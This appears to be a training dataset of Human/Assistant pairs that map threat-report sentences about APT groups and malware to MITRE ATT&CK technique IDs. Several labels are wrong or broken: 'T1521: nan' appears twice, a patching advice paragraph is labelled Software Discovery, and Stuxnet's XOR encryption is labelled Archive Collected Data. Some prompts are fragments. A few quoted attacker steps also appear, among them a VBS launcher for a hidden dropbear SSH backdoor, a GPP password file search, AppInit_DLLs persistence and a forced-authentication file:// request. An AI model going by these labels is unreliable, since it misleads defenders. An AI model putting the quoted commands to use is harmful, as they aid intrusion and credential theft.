Human:Find the techniques and ID from MITRE ATT&CK framework.,By using this technique, the malware is able to leverage itself from a signed and verified legitimate Windows OS process, or, alternatively, if aswrundll.exe or unins000.exe exists, a signed and verified security product process### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has created admin accounts on a compromised host.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN can perform screen captures of the victim’s machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT collects the IP address and MAC address from the system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used the LadonGo scanner to scan target networks.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The AES key is unique for each communication and is encrypted with one of two RSA public keys### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather credentials from information stored in the Proc filesystem or /proc.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has been executed through malicious e-mail attachments Pony has attempted to lure targets into downloading an attached executable or document .### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used various strains of malware to query the Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Glimpse’s Agent Control Panel showing the interface actors would use to send commands The actor clicks the command to view the results in a popup window named “Result Viewer”### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali has achieved execution through victims clicking links to malicious websites.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth collects the machine name and keyboard language from the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay has used names to mimic legitimate software including ""vmtoolsd.exe"" to spoof Vmtools.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 used VBS scripts to help perform tasks on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect user account information by running net user /domain or a series of other commands on a victim.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT gathers the username from the system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We’ve identified two such files: settings.db sdfg3d.db Here’s how such a database file appears: These are BASE64 encoded and use the same RC4 encryption key as the malware configuration### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 19. Scrambling ‘Mac OSX 10.12’ Encryption The scrambled byte sequence is passed onto the constructor of the class Packet::Packet, which creates a random AES256 key and encrypts the buffer with this key### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET identifies the macOS version and uses ioreg to determine serial number.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also copies files from USB devices to a predefined directory.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM has used stolen certificates to sign its tools including those from Whizzimo LLC.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has used shellcode which reads code stored in the registry keys \REGISTRY\SOFTWARE\Microsoft\DRM using the native Windows API as well as read HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces as part of its C2.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ferocious Kitten has acquired domains imitating legitimate sites.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Delivery TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs decrypts and extracts a copy of its main DLL payload when executing.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 obtained information about the configured Exchange virtual directory using Get-WebServicesVirtualDirectory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GeminiDuke collects information on programs and services on the victim that are configured to automatically run at startup.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats saved malicious files within the AppData and Startup folders to maintain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dacls can encrypt its configuration file with AES CBC.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has executed downloaded DLLs with rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon enticed users to click on links in spearphishing emails to download malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer has a data wiper component that enumerates keys in the Registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has the ability to download files from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has lured targets to click on malicious files to gain execution in the target environment.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can send files from the victim machine to C2.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has used openssl to decrypt AES encrypted payload data.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 conducted internal reconnaissance with a Windows batch file leveraging Adfind to query Active Directory, then 7-zip to compress the results for exfiltration### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create self-signed code signing certificates that can be used during targeting.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mitigation As this sample installs itself through the use of EternalBlue, the targeted protocol is SMB.  Because of this, in order to best mitigate and avoid possible installations, you need your system updated to the latest security patches.  Specifically, you’d want to make sure that you have MS17-010 installed, as this is the security patch that patches the EternalBlue vulnerability### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,sticky key ### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used SDelete to remove artifacts from victims.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The modification includes a specific password which is implanted in the operating system image via the patch.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda has used ping to identify other machines of interest.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can process steganographic images attached to email messages to send and receive C2 commands.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 downloaded and launched code within a SCT file.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis can use Base64 to encode its C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used CVE-2016-7255 to escalate privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,of the Win32 API.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has achieved persistence via scheduled tasks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This account modification may immediately follow Create Account or other malicious account activity.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux has a command to execute a shell command on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credentials targeted by PinchDuke include ones associated with many sources such as The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, and Microsoft Outlook.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis queries the Registry for keys and values.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This command will automatically set the DNS type to use for actual C2 $showconfig Uploads the current configuration of the payload to the C2 slpx:\d+ Sets the sleep interval between outbound DNS requests $fileUpload Downloads contents from the C2 server and writes them to a specified file Table 3 Commands available to payload Campaign Analysis The following domains are configured within the payload to be used as C2s### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto collects information on bookmarks from Google Chrome.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant can remotely open applications on the infected host with the ShellExecuteA command.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has named the task for a reverse proxy lpupdate to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Also, this variant of OopsIE uses the output of the whoami command as the parameter within the URL when communicating with the C2 server, which differs from the previous OopsIE variant that used the hostname and username from the environment variables### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has lured victims to execute malware with spearphishing attachments containing macros to download either Emotet, Bokbot, TrickBot, or Bazar.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team's research of potential victim organizations included the identification and collection of employee information.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse BITS to download, execute, and even clean up after running malicious code.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the order to run the SSH server, the attackers created a VBS file with the following content: Set WshShell = CreateObject(“WScript.Shell”) WshShell.CurrentDirectory = “C:\WINDOWS\TEMP\Dropbear\” WshShell.Run “dropbear.exe -r rsa -d dss -a -p 6789”, 0, false As is evident here, the SSH server will accept connections on port number 6789### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files: * Metasploit’s post exploitation module: post/windows/gather/credentials/gpp * Get-GPPPassword * gpprefdecrypt.py On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml APT33 has used a variety of publicly available tools like Gpppassword to gather credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has used WMI to discover network connections and configurations.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows Credential Manager separates website credentials from application or network credentials in two lockers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has used the ps command to list processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.) The implants covered in this research establish a permanent presence on the victim’s system once the PowerShell implant is executed### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pasam creates a backdoor through which remote attackers can retrieve lists of files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type may create a file containing the results of the command cmd.exe /c net user {Username}.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The simplest, ""single-flux"" method, involves registering and de-registering an addresses as part of the DNS A record list for a single DNS name.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,You can see that in addition to the code, the author copy-pasted English typos such as ""IE Registery"":PDB PathsWe can clearly identify a pattern in the PDB naming convention of all the binaries mentioned in this article.ROKRAT:e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb (from the ""Evil New Year"" campaign)d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb (from the ""North Korean Human Rights"" campaignD:\HighSchool\version 13\First-Dragon(VS2015)\Sample\Release\DogCall.pdb (ROKRAT Sample from an unidentified campaign from June)Wiper:D:\HighSchool\version 13\VC2008(Version15)\T+M\T+M\TMProject\Release\ErasePartition.pdb (From the ""Are You Happy?"" campaign)Summary GraphHere is a graph to visualize the similarities and differences between each campaign mentioned in this article:ConclusionSouth Korea is becoming an important target for malicious actors and the techniques used are becoming specific to the region (for example: use of native language to try and ensure the targets feel that the information, document or email being sent to them has added legitimacy)### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can capture screenshots of the victim’s desktop.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet has the ability to search for a given process name in processes currently running in the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regular Expressions ([^r-v\\s])[r-v]([\\w\\d+\\/=]+)-\\w+.(||) Address:\\s+(([a-fA-F0-9]{0,4}:{1,4}[\\w|:]+){1,8}) Address:\\s+(([a-fA-F0-9]{0,4}:{1,2}){1,8}) ([^r-v\\s]+)[r-v]([\\w\\d+\\/=]+).(||) (\\w+).(||) Address:\\s+(\\d+.\\d+.\\d+.\\d+) Table 3 Regular expressions used by RogueRobin The C# variant, like its PowerShell relative, will issue DNS queries to determine which query types can successfully communicate with its C2 servers### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has routed traffic over Tor and VPN servers to obfuscate their activities.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SamSam has been seen using AES or DES to encrypt payloads and payload components.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some variants of Cherry Picker use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ""AppInit_DLLs""=""pserver32.dll"" Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST checked for a variety of antivirus/endpoint detection agents prior to execution.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains that have connected network access.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver encrypts some of its files with XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A task can also be scheduled on a remote system, provided the proper authentication is met .### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner can steal saved usernames and passwords in Chrome as well as credit card credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise encrypts exfiltrated data with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot uses non-descriptive names to hide functionality and uses an AES CBC encryption algorithm for its loader and configuration files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has had its code obfuscated in an apparent attempt to make analysis difficult.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the at utility to perform task scheduling for initial, recurring, or future execution of malicious code.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 downloads and executes PowerShell scripts and performs PowerShell commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used the BlackEnergy KillDisk component to overwrite files on Windows-based Human-Machine Interfaces.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The TAINTEDSCRIBE command and execution module can perform target system enumeration.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has the capability to gather the IP address from the victim's machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has injected a DLL into svchost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used open-source C2 frameworks, including Covenant.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic with Web Protocols or lending credibility to a credential harvesting site.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has enabled Wdigest by changing the registry value from 0 to 1.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee gathers computer name and information using the systeminfo command.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can add other programs or processes to this registry value which will automatically launch at boot.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used “systeminfo” and similar commands to acquire detailed configuration information of a victim machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also use internationalized domain names to create visually similar lookalike domains for use in operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Golden tickets require adversaries to interact with the Key Distribution Center in order to obtain TGS.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic.### Assistant: T1092: Communication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth has used Tasklist to get information on processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can enumerate computers and network devices.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may poison Address Resolution Protocol caches to position themselves between the communication of two or more networked devices.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has injected HTML codes into banking sites to steal sensitive online banking information .### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions .### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures ""cmd.exe,"" or another program that provides backdoor access, as a ""debugger"" for an accessibility program .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy communicates with its C2 server over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may post content, known as a dead drop resolver, on Web services with embedded domains or IP addresses.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AutoIt backdoor is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can enumerate and search for files and directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to clean up installed files, delete files, and delete itself from the victim’s machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has collected Office, PDF, and HWP documents from its victims.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has created a hidden directory under C:\ProgramData\Apple\Updates\ and C:\Users\Public\Documents\Flash\.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has executed PowerShell scripts via WMI.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy also runs the echo %APPDATA% command to list the contents of the directory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used a script that extracts the web session cookie and sends it to the C2 server.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IFEOs enable a developer to attach a debugger to an application.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT uses multiple protocols for its C2 server as fallback channels if communication with one is unsuccessful.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The document can include, for example, a request similar to file://remote address/Normal.dotm to trigger the SMB request.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can enumerate shared drives on the domain.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.### Assistant: T1092: Communication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt can delete files from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon contains base64-encoded strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used Wevtutil to remove PowerShell execution logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has used cmd.exe to run a PowerShell script.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These credentials are used with PsExec and Windows Management Instrumentation to help the malware propagate itself across a network.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor has used NTFS to hide files.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent has the ability to add bytes to change the file hash.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This screenshot is via an RDP session as indicated by the tab located at the top of the screen and is located at 164.132.67[.]216 which is hosted by OVH### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used multiple backdoors which communicate with a C2 server via email attachments.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes can steal login credentials and stored financial information from the browser.### Assistant: T1555: Credentials from Password Stores" "### 